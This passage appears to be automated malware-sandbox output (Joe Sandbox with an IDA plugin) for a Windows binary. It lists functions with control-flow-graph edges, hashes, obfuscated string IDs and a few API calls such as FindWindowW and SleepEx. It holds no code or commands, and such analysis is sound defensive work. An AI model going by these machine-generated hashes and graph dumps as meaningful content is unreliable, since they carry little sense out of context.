                                                                                • Instruction ID: c78b758b90d0707eca9989b6d8b0a7f8d3e1a4ca706a99bf309b92b0b95fab54
                                                                                • Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
                                                                                • Instruction Fuzzy Hash: 4E31A27260C78186EB648F55F86472F66A0FBC8755F104039EACE86BA8DF3CD4888B00
                                                                                Function 00007FF6CC3B07D0 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 589COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1141 7ff6cc3b07d0-7ff6cc3b0817 1142 7ff6cc3b0829-7ff6cc3b083b 1141->1142 1143 7ff6cc3b08d0-7ff6cc3b08d7 1142->1143 1144 7ff6cc3b0841-7ff6cc3b0848 1142->1144 1145 7ff6cc3b09d0-7ff6cc3b09d7 1143->1145 1146 7ff6cc3b08dd-7ff6cc3b08e4 1143->1146 1147 7ff6cc3b0940-7ff6cc3b0947 1144->1147 1148 7ff6cc3b084e-7ff6cc3b0855 1144->1148 1149 7ff6cc3b0b5e-7ff6cc3b0b65 1145->1149 1150 7ff6cc3b09dd-7ff6cc3b09e4 1145->1150 1151 7ff6cc3b0a9c-7ff6cc3b0aa3 1146->1151 1152 7ff6cc3b08ea-7ff6cc3b08f1 1146->1152 1153 7ff6cc3b0b07-7ff6cc3b0b0e 1147->1153 1154 7ff6cc3b094d-7ff6cc3b0954 1147->1154 1155 7ff6cc3b0a48-7ff6cc3b0a4f 1148->1155 1156 7ff6cc3b085b-7ff6cc3b0862 1148->1156 1163 7ff6cc3b0e3a-7ff6cc3b0e41 1149->1163 1164 7ff6cc3b0b6b-7ff6cc3b0b72 1149->1164 1159 7ff6cc3b0d09-7ff6cc3b0d10 1150->1159 1160 7ff6cc3b09ea-7ff6cc3b09f1 1150->1160 1169 7ff6cc3b0d8f-7ff6cc3b0da3 1151->1169 1170 7ff6cc3b0aa9-7ff6cc3b0ab0 1151->1170 1161 7ff6cc3b0c32-7ff6cc3b0c39 1152->1161 1162 7ff6cc3b08f7-7ff6cc3b08fe 1152->1162 1157 7ff6cc3b0b14-7ff6cc3b0b1b 1153->1157 1158 7ff6cc3b0ddd-7ff6cc3b0de4 1153->1158 1167 7ff6cc3b0c8f-7ff6cc3b0c96 1154->1167 1168 7ff6cc3b095a-7ff6cc3b0961 1154->1168 1165 7ff6cc3b0d5f-7ff6cc3b0d66 1155->1165 1166 7ff6cc3b0a55-7ff6cc3b0a5c 1155->1166 1171 7ff6cc3b0ba8-7ff6cc3b0baf 1156->1171 1172 7ff6cc3b0868-7ff6cc3b086f 1156->1172 1175 7ff6cc3b0b21-7ff6cc3b0b28 1157->1175 1176 7ff6cc3b1147-7ff6cc3b1151 1157->1176 1173 7ff6cc3b1331-7ff6cc3b133f 1158->1173 1174 7ff6cc3b0dea-7ff6cc3b0dfd 1158->1174 1193 7ff6cc3b12a2-7ff6cc3b12b0 1159->1193 1194 7ff6cc3b0d16-7ff6cc3b0d29 1159->1194 1191 7ff6cc3b0fd2-7ff6cc3b0fee 1160->1191 1192 7ff6cc3b09f7-7ff6cc3b09fe 1160->1192 1187 7ff6cc3b0c3f-7ff6cc3b0c52 1161->1187 1188 7ff6cc3b1229-7ff6cc3b1253 1161->1188 1179 7ff6cc3b0904-7ff6cc3b090b 1162->1179 1180 7ff6cc3b0f13-7ff6cc3b0f3e 1162->1180 1177 7ff6cc3b0e47-7ff6cc3b0e5a 1163->1177 1178 7ff6cc3b138d 1163->1178 1181 7ff6cc3b0b78-7ff6cc3b0b7f 1164->1181 1182 7ff6cc3b116b-7ff6cc3b1181 1164->1182 1197 7ff6cc3b1313-7ff6cc3b132c 1165->1197 1198 7ff6cc3b0d6c-7ff6cc3b0d7f 1165->1198 1195 7ff6cc3b100f-7ff6cc3b1026 1166->1195 1196 7ff6cc3b0a62-7ff6cc3b0a69 1166->1196 1189 7ff6cc3b1258-7ff6cc3b1287 1167->1189 1190 7ff6cc3b0c9c-7ff6cc3b0caf 1167->1190 1183 7ff6cc3b0967-7ff6cc3b096e 1168->1183 1184 7ff6cc3b0f8a-7ff6cc3b0fa3 1168->1184 1169->1142 1199 7ff6cc3b0da9-7ff6cc3b0dbc 1169->1199 1200 7ff6cc3b0ab6-7ff6cc3b0abd 1170->1200 1201 7ff6cc3b1097-7ff6cc3b10fb IsDlgButtonChecked 1170->1201 1185 7ff6cc3b121f-7ff6cc3b1224 1171->1185 1186 7ff6cc3b0bb5-7ff6cc3b0bbc 1171->1186 1202 7ff6cc3b0875-7ff6cc3b087c 1172->1202 1203 7ff6cc3b0e6a-7ff6cc3b0e9d 1172->1203 1217 7ff6cc3b1341 1173->1217 1218 7ff6cc3b1346-7ff6cc3b1388 1173->1218 1174->1142 1226 7ff6cc3b0e03-7ff6cc3b0e2d 1174->1226 1206 7ff6cc3b1161-7ff6cc3b1166 1175->1206 1207 7ff6cc3b0b2e-7ff6cc3b0b41 1175->1207 1208 7ff6cc3b0820-7ff6cc3b0826 1176->1208 1242 7ff6cc3b1157-7ff6cc3b115c 1176->1242 1177->1142 1227 7ff6cc3b0e60 1177->1227 1216 7ff6cc3b1397-7ff6cc3b13aa 1178->1216 1228 7ff6cc3b0911-7ff6cc3b0924 1179->1228 1229 7ff6cc3b0f4d-7ff6cc3b0f71 1179->1229 1232 7ff6cc3b0f40 1180->1232 1233 7ff6cc3b0f45-7ff6cc3b0f48 1180->1233 1211 7ff6cc3b0b85-7ff6cc3b0b98 1181->1211 1212 7ff6cc3b11dc-7ff6cc3b121a 1181->1212 1204 7ff6cc3b1183 1182->1204 1205 7ff6cc3b1188-7ff6cc3b11d7 1182->1205 1234 7ff6cc3b0974-7ff6cc3b0987 1183->1234 1235 7ff6cc3b0fa8-7ff6cc3b0fcd 1183->1235 1184->1208 1185->1208 1215 7ff6cc3b0bc2-7ff6cc3b0c27 IsDlgButtonChecked 1186->1215 1186->1216 1187->1142 1219 7ff6cc3b0c58-7ff6cc3b0c8a 1187->1219 1188->1208 1209 7ff6cc3b128f-7ff6cc3b129d 1189->1209 1210 7ff6cc3b1289 1189->1210 1190->1142 1220 7ff6cc3b0cb5-7ff6cc3b0cd8 1190->1220 1191->1208 1236 7ff6cc3b0a04-7ff6cc3b0a17 1192->1236 1237 7ff6cc3b0ff3-7ff6cc3b100a 1192->1237 1213 7ff6cc3b12b2 1193->1213 1214 7ff6cc3b12b7-7ff6cc3b130e 1193->1214 1194->1142 1221 7ff6cc3b0d2f-7ff6cc3b0d5a 1194->1221 1195->1208 1238 7ff6cc3b0a6f-7ff6cc3b0a82 1196->1238 1239 7ff6cc3b102b-7ff6cc3b108f IsDlgButtonChecked 1196->1239 1197->1208 1198->1142 1222 7ff6cc3b0d85-7ff6cc3b0d8a 1198->1222 1199->1142 1223 7ff6cc3b0dc2-7ff6cc3b0dd8 1199->1223 1243 7ff6cc3b0ac3-7ff6cc3b0ad6 1200->1243 1244 7ff6cc3b110b-7ff6cc3b112d 1200->1244 1240 7ff6cc3b1101-7ff6cc3b1106 1201->1240 1241 7ff6cc3b0819-7ff6cc3b081b 1201->1241 1224 7ff6cc3b0882-7ff6cc3b0895 1202->1224 1225 7ff6cc3b0ed3-7ff6cc3b0f0e 1202->1225 1230 7ff6cc3b0e9f 1203->1230 1231 7ff6cc3b0ea4-7ff6cc3b0ece 1203->1231 1204->1205 1205->1142 1206->1208 1207->1142 1245 7ff6cc3b0b47-7ff6cc3b0b59 1207->1245 1208->1142 1209->1208 1210->1209 1211->1142 1246 7ff6cc3b0b9e-7ff6cc3b0ba3 1211->1246 1212->1208 1213->1214 1214->1208 1215->1241 1247 7ff6cc3b0c2d 1215->1247 1216->1142 1248 7ff6cc3b13b0-7ff6cc3b13c9 1216->1248 1217->1218 1218->1142 1219->1208 1249 7ff6cc3b0cdf-7ff6cc3b0d04 1220->1249 1250 7ff6cc3b0cda 1220->1250 1221->1208 1222->1208 1223->1208 1224->1142 1251 7ff6cc3b0897-7ff6cc3b08bf 1224->1251 1225->1208 1226->1163 1227->1203 1228->1142 1252 7ff6cc3b092a-7ff6cc3b093b 1228->1252 1254 7ff6cc3b0f73 1229->1254 1255 7ff6cc3b0f79-7ff6cc3b0f85 1229->1255 1230->1231 1231->1208 1232->1233 1233->1208 1234->1142 1253 7ff6cc3b098d-7ff6cc3b09c1 1234->1253 1235->1208 1236->1142 1256 7ff6cc3b0a1d-7ff6cc3b0a43 1236->1256 1237->1208 1238->1142 1258 7ff6cc3b0a88-7ff6cc3b0a97 1238->1258 1239->1241 1257 7ff6cc3b1095 1239->1257 1240->1241 1241->1208 1242->1208 1243->1142 1261 7ff6cc3b0adc-7ff6cc3b0b02 1243->1261 1259 7ff6cc3b112f 1244->1259 1260 7ff6cc3b1135-7ff6cc3b1142 1244->1260 1245->1208 1246->1208 1247->1240 1249->1208 1250->1249 1251->1208 1252->1208 1253->1208 1254->1255 1255->1208 1256->1208 1257->1240 1258->1208 1259->1260 1260->1208 1261->1142
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gFW$gFW$gFW$dT$dT$dT
                                                                                • API String ID: 0-1908915228
                                                                                • Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                                                • Instruction ID: 7b69cd8607df274cebc46076107f1512457b4dd4a84d3e6bc4379565e0344300
                                                                                • Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                                                • Instruction Fuzzy Hash: C5429E72B0CFC586DAB48F05F460ABAA6A1E7C9B91F104136CACD87B94CE3CD5419B85
                                                                                Function 00007FF6CC393030 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 247COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1263 7ff6cc393030-7ff6cc39306b 1264 7ff6cc393080-7ff6cc393085 1263->1264 1265 7ff6cc393140-7ff6cc393145 1264->1265 1266 7ff6cc39308b-7ff6cc393090 1264->1266 1267 7ff6cc393240-7ff6cc393245 1265->1267 1268 7ff6cc39314b-7ff6cc393150 1265->1268 1269 7ff6cc3931e0-7ff6cc3931e5 1266->1269 1270 7ff6cc393096-7ff6cc39309b 1266->1270 1271 7ff6cc39332e-7ff6cc393333 1267->1271 1272 7ff6cc39324b-7ff6cc393250 1267->1272 1273 7ff6cc393156-7ff6cc39315b 1268->1273 1274 7ff6cc3932bd-7ff6cc3932c2 1268->1274 1275 7ff6cc3932f6-7ff6cc3932fb 1269->1275 1276 7ff6cc3931eb-7ff6cc3931f0 1269->1276 1277 7ff6cc3930a1-7ff6cc3930a6 1270->1277 1278 7ff6cc393286-7ff6cc39328b 1270->1278 1283 7ff6cc3934a8-7ff6cc3934b7 1271->1283 1284 7ff6cc393339-7ff6cc39333e 1271->1284 1279 7ff6cc393256-7ff6cc39325b 1272->1279 1280 7ff6cc39306d-7ff6cc39307f 1272->1280 1281 7ff6cc393161-7ff6cc393166 1273->1281 1282 7ff6cc3933bb-7ff6cc3933db call 7ff6cc3b5870 1273->1282 1289 7ff6cc393447-7ff6cc393458 1274->1289 1290 7ff6cc3932c8-7ff6cc3932cd 1274->1290 1293 7ff6cc393301-7ff6cc393306 1275->1293 1294 7ff6cc393474-7ff6cc393489 1275->1294 1287 7ff6cc3931f6-7ff6cc3931fb 1276->1287 1288 7ff6cc39338c-7ff6cc393391 1276->1288 1291 7ff6cc393366-7ff6cc39336b 1277->1291 1292 7ff6cc3930ac-7ff6cc3930b1 1277->1292 1285 7ff6cc393291-7ff6cc393296 1278->1285 1286 7ff6cc393416-7ff6cc393427 1278->1286 1295 7ff6cc393261-7ff6cc393266 1279->1295 1296 7ff6cc393404-7ff6cc393411 1279->1296 1280->1264 1307 7ff6cc3933e0-7ff6cc3933f5 1281->1307 1308 7ff6cc39316c-7ff6cc393171 1281->1308 1282->1264 1299 7ff6cc3934be-7ff6cc3934c8 1283->1299 1300 7ff6cc3934b9 1283->1300 1309 7ff6cc393344-7ff6cc393349 1284->1309 1310 7ff6cc3934cd-7ff6cc3934e5 1284->1310 1297 7ff6cc39342c-7ff6cc393437 1285->1297 1298 7ff6cc39329c-7ff6cc3932a1 1285->1298 1286->1264 1313 7ff6cc393201-7ff6cc393206 1287->1313 1314 7ff6cc3933fa-7ff6cc3933ff 1287->1314 1315 7ff6cc3934f7-7ff6cc3934fc 1288->1315 1316 7ff6cc393397-7ff6cc3933ac 1288->1316 1289->1264 1301 7ff6cc3932d3-7ff6cc3932d8 1290->1301 1302 7ff6cc39345d-7ff6cc39346f 1290->1302 1311 7ff6cc393371-7ff6cc393387 1291->1311 1312 7ff6cc3934ea-7ff6cc3934ef 1291->1312 1303 7ff6cc3933b1-7ff6cc3933b6 1292->1303 1304 7ff6cc3930b7-7ff6cc3930bc 1292->1304 1305 7ff6cc39348e-7ff6cc3934a3 1293->1305 1306 7ff6cc39330c-7ff6cc393311 1293->1306 1294->1264 1295->1264 1318 7ff6cc39326c-7ff6cc393276 1295->1318 1296->1264 1297->1264 1319 7ff6cc39343d-7ff6cc393442 1297->1319 1298->1264 1320 7ff6cc3932a7-7ff6cc3932b8 FindCloseChangeNotification 1298->1320 1299->1264 1300->1299 1301->1264 1321 7ff6cc3932de-7ff6cc3932f1 1301->1321 1302->1264 1303->1264 1304->1264 1322 7ff6cc3930be-7ff6cc393120 1304->1322 1305->1264 1306->1264 1324 7ff6cc393317-7ff6cc393329 call 7ff6cc355770 1306->1324 1307->1264 1308->1264 1326 7ff6cc393177-7ff6cc3931c5 1308->1326 1309->1264 1327 7ff6cc39334f-7ff6cc393361 1309->1327 1310->1264 1311->1264 1312->1264 1323 7ff6cc3934f5 1312->1323 1313->1264 1328 7ff6cc39320c-7ff6cc393222 call 7ff6cc394370 1313->1328 1314->1264 1315->1264 1325 7ff6cc393502 call 7ff6cc3b47d0 1315->1325 1316->1264 1318->1264 1330 7ff6cc39327c-7ff6cc393281 1318->1330 1319->1264 1320->1264 1321->1264 1331 7ff6cc393122 1322->1331 1332 7ff6cc393127-7ff6cc393131 1322->1332 1333 7ff6cc393507-7ff6cc393522 1323->1333 1324->1264 1325->1333 1326->1264 1336 7ff6cc3931cb-7ff6cc3931d0 1326->1336 1327->1264 1328->1264 1340 7ff6cc393228-7ff6cc39322d 1328->1340 1330->1264 1331->1332 1332->1264 1336->1264 1340->1264
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
                                                                                • API String ID: 0-2770720463
                                                                                • Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                                                • Instruction ID: 325043fc485f74c475ed383d35ad13348375233cee58e9d3aaf0dfc3c8386d7c
                                                                                • Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
                                                                                • Instruction Fuzzy Hash: F3B1CB66E0DBC591EAF44F19B48077E6390EB45791F280436E9CECB754CE2ED8908742
                                                                                Function 00007FF6CC3AFF60 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 308COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1341 7ff6cc3aff60-7ff6cc3affa5 1342 7ff6cc3affc0-7ff6cc3affc5 1341->1342 1343 7ff6cc3b0010-7ff6cc3b0015 1342->1343 1344 7ff6cc3affc7-7ff6cc3affcc 1342->1344 1347 7ff6cc3b00d0-7ff6cc3b00d5 1343->1347 1348 7ff6cc3b001b-7ff6cc3b0020 1343->1348 1345 7ff6cc3b0060-7ff6cc3b0065 1344->1345 1346 7ff6cc3affd2-7ff6cc3affd7 1344->1346 1349 7ff6cc3b0192-7ff6cc3b0197 1345->1349 1350 7ff6cc3b006b-7ff6cc3b0070 1345->1350 1351 7ff6cc3b010d-7ff6cc3b0112 1346->1351 1352 7ff6cc3affdd-7ff6cc3affe2 1346->1352 1353 7ff6cc3b01c7-7ff6cc3b01cc 1347->1353 1354 7ff6cc3b00db-7ff6cc3b00e0 1347->1354 1355 7ff6cc3b0026-7ff6cc3b002b 1348->1355 1356 7ff6cc3b013c-7ff6cc3b0141 1348->1356 1369 7ff6cc3b0401-7ff6cc3b046b 1349->1369 1370 7ff6cc3b019d-7ff6cc3b01a2 1349->1370 1363 7ff6cc3b0275-7ff6cc3b02b3 call 7ff6cc3959d0 1350->1363 1364 7ff6cc3b0076-7ff6cc3b007b 1350->1364 1361 7ff6cc3b02fe-7ff6cc3b03a6 FindWindowW 1351->1361 1362 7ff6cc3b0118-7ff6cc3b011d 1351->1362 1367 7ff6cc3affe8-7ff6cc3affed 1352->1367 1368 7ff6cc3b01eb-7ff6cc3b01f0 1352->1368 1359 7ff6cc3b047f-7ff6cc3b04af call 7ff6cc395100 1353->1359 1360 7ff6cc3b01d2-7ff6cc3b01d7 1353->1360 1371 7ff6cc3b02e9-7ff6cc3b02f9 1354->1371 1372 7ff6cc3b00e6-7ff6cc3b00eb 1354->1372 1357 7ff6cc3b0031-7ff6cc3b0036 1355->1357 1358 7ff6cc3b0237-7ff6cc3b0247 1355->1358 1365 7ff6cc3b0147-7ff6cc3b014c 1356->1365 1366 7ff6cc3b03cb-7ff6cc3b03e7 1356->1366 1382 7ff6cc3b024c-7ff6cc3b0270 1357->1382 1383 7ff6cc3b003c-7ff6cc3b0041 1357->1383 1358->1342 1359->1342 1384 7ff6cc3b04b4-7ff6cc3b04b9 1360->1384 1385 7ff6cc3b01dd-7ff6cc3b01e6 1360->1385 1361->1342 1373 7ff6cc3b0123-7ff6cc3b0128 1362->1373 1374 7ff6cc3b03ab-7ff6cc3b03c6 1362->1374 1363->1342 1386 7ff6cc3b0081-7ff6cc3b0086 1364->1386 1387 7ff6cc3b02b8-7ff6cc3b02e4 1364->1387 1376 7ff6cc3b0152-7ff6cc3b0157 1365->1376 1377 7ff6cc3b03ec-7ff6cc3b03fc 1365->1377 1366->1342 1378 7ff6cc3b01f5-7ff6cc3b0232 call 7ff6cc395260 1367->1378 1379 7ff6cc3afff3-7ff6cc3afff8 1367->1379 1368->1342 1369->1342 1380 7ff6cc3b0470-7ff6cc3b047a 1370->1380 1381 7ff6cc3b01a8-7ff6cc3b01ad 1370->1381 1371->1342 1389 7ff6cc3b00f1-7ff6cc3b00f6 1372->1389 1390 7ff6cc3affa7-7ff6cc3affb3 1372->1390 1373->1342 1392 7ff6cc3b012e-7ff6cc3b0137 1373->1392 1374->1342 1376->1342 1394 7ff6cc3b015d-7ff6cc3b018d call 7ff6cc395100 1376->1394 1377->1342 1378->1342 1379->1342 1396 7ff6cc3afffa-7ff6cc3b000d 1379->1396 1380->1342 1381->1342 1397 7ff6cc3b01b3-7ff6cc3b01b7 1381->1397 1382->1342 1383->1342 1398 7ff6cc3b0047-7ff6cc3b005a 1383->1398 1384->1342 1395 7ff6cc3b04bf-7ff6cc3b04d9 1384->1395 1385->1342 1386->1342 1400 7ff6cc3b008c-7ff6cc3b00c5 call 7ff6cc3b47d0 * 2 1386->1400 1387->1342 1389->1342 1391 7ff6cc3b00fc-7ff6cc3b0108 1389->1391 1390->1342 1391->1342 1402 7ff6cc3b01bc-7ff6cc3b01c2 1392->1402 1394->1342 1396->1342 1397->1402 1398->1342 1400->1342 1402->1342
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %<L,$%<L,$-YV$-YV$-YV
                                                                                • API String ID: 0-1602977039
                                                                                • Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                                                • Instruction ID: cd2afbbada2eaf5434ef9d71e7e70d357fdc476bc81bd9d8b3070a4194f25195
                                                                                • Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
                                                                                • Instruction Fuzzy Hash: CCD12722A14F9589FB608F69E8856BD23A0BB4C789F204532EE8DD3758DF3CD5938340
                                                                                Function 00007FF6CC3B5870 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1411 7ff6cc3b5870-7ff6cc3b588e 1412 7ff6cc3b58a0-7ff6cc3b58a5 1411->1412 1413 7ff6cc3b5900-7ff6cc3b5905 1412->1413 1414 7ff6cc3b58a7-7ff6cc3b58ac 1412->1414 1417 7ff6cc3b59c0-7ff6cc3b59c5 1413->1417 1418 7ff6cc3b590b-7ff6cc3b5910 1413->1418 1415 7ff6cc3b5980-7ff6cc3b5985 1414->1415 1416 7ff6cc3b58b2-7ff6cc3b58b7 1414->1416 1419 7ff6cc3b5a4b-7ff6cc3b5a50 1415->1419 1420 7ff6cc3b598b-7ff6cc3b5990 1415->1420 1421 7ff6cc3b58bd-7ff6cc3b58c2 1416->1421 1422 7ff6cc3b59eb-7ff6cc3b59f0 1416->1422 1423 7ff6cc3b5a80-7ff6cc3b5a85 1417->1423 1424 7ff6cc3b59cb-7ff6cc3b59d0 1417->1424 1425 7ff6cc3b5a2e-7ff6cc3b5a33 1418->1425 1426 7ff6cc3b5916-7ff6cc3b591b 1418->1426 1427 7ff6cc3b5a56-7ff6cc3b5a5b 1419->1427 1428 7ff6cc3b5bed-7ff6cc3b5c15 RtlRestoreThreadPreferredUILanguages 1419->1428 1429 7ff6cc3b5890-7ff6cc3b5895 1420->1429 1430 7ff6cc3b5996-7ff6cc3b599b 1420->1430 1431 7ff6cc3b5ab0-7ff6cc3b5ac1 1421->1431 1432 7ff6cc3b58c8-7ff6cc3b58cd 1421->1432 1437 7ff6cc3b5bb3-7ff6cc3b5bd4 1422->1437 1438 7ff6cc3b59f6-7ff6cc3b59fb 1422->1438 1433 7ff6cc3b5c1a-7ff6cc3b5c1f 1423->1433 1434 7ff6cc3b5a8b-7ff6cc3b5a90 1423->1434 1435 7ff6cc3b5b9f-7ff6cc3b5bae 1424->1435 1436 7ff6cc3b59d6-7ff6cc3b59db 1424->1436 1441 7ff6cc3b5bd9-7ff6cc3b5be8 1425->1441 1442 7ff6cc3b5a39-7ff6cc3b5a3e 1425->1442 1439 7ff6cc3b5921-7ff6cc3b5926 1426->1439 1440 7ff6cc3b5aea-7ff6cc3b5b0b 1426->1440 1427->1412 1449 7ff6cc3b5a61-7ff6cc3b5a7b 1427->1449 1428->1412 1429->1412 1443 7ff6cc3b59a1-7ff6cc3b59a6 1430->1443 1444 7ff6cc3b5b54-7ff6cc3b5b79 1430->1444 1431->1412 1450 7ff6cc3b58d3-7ff6cc3b58d8 1432->1450 1451 7ff6cc3b5ac6-7ff6cc3b5ae5 1432->1451 1433->1412 1434->1412 1452 7ff6cc3b5a96-7ff6cc3b5aa0 1434->1452 1435->1412 1445 7ff6cc3b59e1-7ff6cc3b59e6 1436->1445 1446 7ff6cc3b5c24-7ff6cc3b5c29 1436->1446 1437->1412 1438->1412 1447 7ff6cc3b5a01-7ff6cc3b5a29 1438->1447 1455 7ff6cc3b5b27-7ff6cc3b5b4f 1439->1455 1456 7ff6cc3b592c-7ff6cc3b5931 1439->1456 1453 7ff6cc3b5b13-7ff6cc3b5b22 1440->1453 1454 7ff6cc3b5b0d 1440->1454 1441->1412 1442->1412 1448 7ff6cc3b5a44-7ff6cc3b5a46 1442->1448 1443->1412 1459 7ff6cc3b59ac-7ff6cc3b59b1 1443->1459 1457 7ff6cc3b5b81-7ff6cc3b5b87 1444->1457 1458 7ff6cc3b5b7b 1444->1458 1445->1412 1446->1412 1460 7ff6cc3b5c2f-7ff6cc3b5c35 1446->1460 1447->1412 1448->1412 1449->1412 1450->1412 1461 7ff6cc3b58da-7ff6cc3b58f3 1450->1461 1451->1412 1452->1412 1462 7ff6cc3b5aa6-7ff6cc3b5aab 1452->1462 1453->1412 1454->1453 1455->1412 1456->1412 1463 7ff6cc3b5937-7ff6cc3b5964 1456->1463 1466 7ff6cc3b5b8f-7ff6cc3b5b91 1457->1466 1467 7ff6cc3b5b89 1457->1467 1458->1457 1459->1412 1461->1412 1462->1412 1464 7ff6cc3b5966 1463->1464 1465 7ff6cc3b596c-7ff6cc3b597a 1463->1465 1464->1465 1465->1412 1466->1412 1469 7ff6cc3b5b97-7ff6cc3b5b9a 1466->1469 1467->1466 1469->1412
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +I}$+I}
                                                                                • API String ID: 0-3898140586
                                                                                • Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                                                • Instruction ID: 779e7b944b82503af6d415da01168caae9701c81073ab7d743053e9aab2b4724
                                                                                • Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
                                                                                • Instruction Fuzzy Hash: 6081F635F1C9818BEA758F1574E093E76909F85762FB45136E98EC77E0CE2DE8408B11
                                                                                Function 00007FF6CC344970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1470 7ff6cc344970-7ff6cc344a09 1471 7ff6cc344a60-7ff6cc344a65 1470->1471 1472 7ff6cc344a67-7ff6cc344a6c 1471->1472 1473 7ff6cc344aa0-7ff6cc344aa5 1471->1473 1476 7ff6cc344a0b-7ff6cc344a17 SleepEx call 7ff6cc3af520 1472->1476 1477 7ff6cc344a6e-7ff6cc344a73 1472->1477 1474 7ff6cc344aab-7ff6cc344ab0 1473->1474 1475 7ff6cc344ba5-7ff6cc344bb4 call 7ff6cc3af520 1473->1475 1478 7ff6cc344bb9-7ff6cc344bbe 1474->1478 1479 7ff6cc344ab6-7ff6cc344b2b call 7ff6cc392f40 1474->1479 1475->1471 1488 7ff6cc344a1c-7ff6cc344a52 1476->1488 1482 7ff6cc344a79-7ff6cc344a7e 1477->1482 1483 7ff6cc344b42-7ff6cc344ba0 1477->1483 1478->1471 1487 7ff6cc344bc4-7ff6cc344bec 1478->1487 1489 7ff6cc344b30-7ff6cc344b3d 1479->1489 1482->1471 1484 7ff6cc344a80-7ff6cc344a91 1482->1484 1483->1471 1484->1471 1488->1471 1489->1471
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
